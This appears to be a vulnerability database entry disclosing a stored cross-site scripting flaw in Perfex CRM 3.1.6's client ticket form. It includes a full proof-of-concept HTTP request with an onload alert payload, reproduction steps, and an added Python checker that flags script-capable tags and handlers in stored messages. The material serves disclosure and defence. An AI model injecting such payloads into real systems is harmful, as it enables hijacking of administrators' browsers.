| Title | Perfex Perfex CRM 3.1.6 Cross Site Scripting |
|---|
| Description | A stored Cross-Site Scripting (XSS) vulnerability was identified in Perfex CRM, specifically in the open ticket functionality. This vulnerability allows an attacker to inject malicious JavaScript into the message parameter of the ticket submission form, which is stored on the server and executed when administrators or other users view the ticket. The vendor has acknowledged the issue and provided a temporary fix, with a patch pending in a future release. CodeCanyon, the platform hosting Perfex CRM, has also initiated their process to ensure the vulnerability is addressed.
The developer and CodeCanyon have been informed of the vulnerability. The developer confirmed the issue and provided a temporary fix, while an official solution is waiting to be released. CodeCanyon also said they are actively working with the developer to make sure the problem is fixed.
Proof of Concept:
POST /perfex/clients/open_ticket HTTP/1.1
Host: 192.168.1.16
Content-Length: 958
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYOUSBSv8TScP0MN8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.16/perfex/clients/open_ticket
Accept-Encoding: gzip, deflate, br
Cookie: csrf_cookie_name=5edada6dd436d0f723d69b2f2d22d692; contact_language=english; sp_session=mth17comeclv6jp5ijtgf1gnnbvb91gc
Connection: keep-alive

------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="csrf_token_name"

5edada6dd436d0f723d69b2f2d22d692
------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="subject"

XSS Proof
------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="project_id"


------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="department"

1
------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="priority"

2
------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="service"

1
------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="message"

XSS Proof <body onload=alert("Vulnerable")>
------WebKitFormBoundaryYOUSBSv8TScP0MN8
Content-Disposition: form-data; name="attachments[0]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryYOUSBSv8TScP0MN8--

In this request, a malicious payload is injected into the message field; when an admin or any other user views the ticket, the JavaScript alert is triggered.
Steps to Reproduce:
1. Navigate to the open ticket form on the Perfex CRM client portal.
2. Submit the form, injecting the following payload into the message parameter:
<body onload=alert("Vulnerable")>
3. The payload is successfully stored in the system.
When an admin or any user views the ticket, the malicious script is executed in the victim's browser. |
|---|
| Source | https://bytium.com/stored-cross-site-scripting-xss-vulnerability-in-perfex-crm/ |
|---|
| User | suffer (UID 74855) |
|---|
| Submission | 09/13/2024 18:28 (2 years ago) |
|---|
| Moderation | 09/14/2024 10:06 (16 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 277504 [Perfex CRM 3.1.6 Parameter Clients.php Message cross site scripting] |
|---|
| Points | 20 |
|---|
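
For reviewing ticket messages that were stored before the temporary fix was applied, the following added example (not part of the original submission and not Perfex CRM code) parses stored message bodies and flags any that carry active content such as the `onload` handler in the proof of concept. It goes beyond the single payload on the page by also flagging script-capable tags and script URLs; the tag policy, function names and sample rows are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Tags with no place in a ticket message body (assumed policy, not Perfex's own).
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "body", "svg", "meta", "base", "form"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class ActiveContentFinder(HTMLParser):
    """Collects reasons a stored HTML fragment could run script when rendered."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names before calling this.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and value:
                # Browsers ignore whitespace and control characters in the scheme.
                scheme = "".join(c for c in value if c > " ").lower()
                if scheme.startswith(SCRIPT_SCHEMES):
                    self.findings.append(f"script URL in {name} on <{tag}>")


def audit_message(message):
    """Return the list of findings for one stored message body."""
    finder = ActiveContentFinder()
    finder.feed(message)
    finder.close()
    return finder.findings


def audit_tickets(rows):
    """rows: iterable of (ticket_id, message); returns {ticket_id: findings} for flagged rows."""
    return {tid: found for tid, msg in rows if (found := audit_message(msg))}


# Constructed sample rows; row 102 holds the message value from the proof of concept.
SAMPLE_ROWS = [
    (101, "<p>Printer on floor 2 is <b>offline</b> again.</p>"),
    (102, 'XSS Proof <body onload=alert("Vulnerable")>'),
    (103, '<a href="https://example.com/invoice">invoice link</a>'),
]
```

Flagged rows are candidates for review and cleanup, not proof of exploitation; a clean result only means none of the patterns in this assumed policy were present.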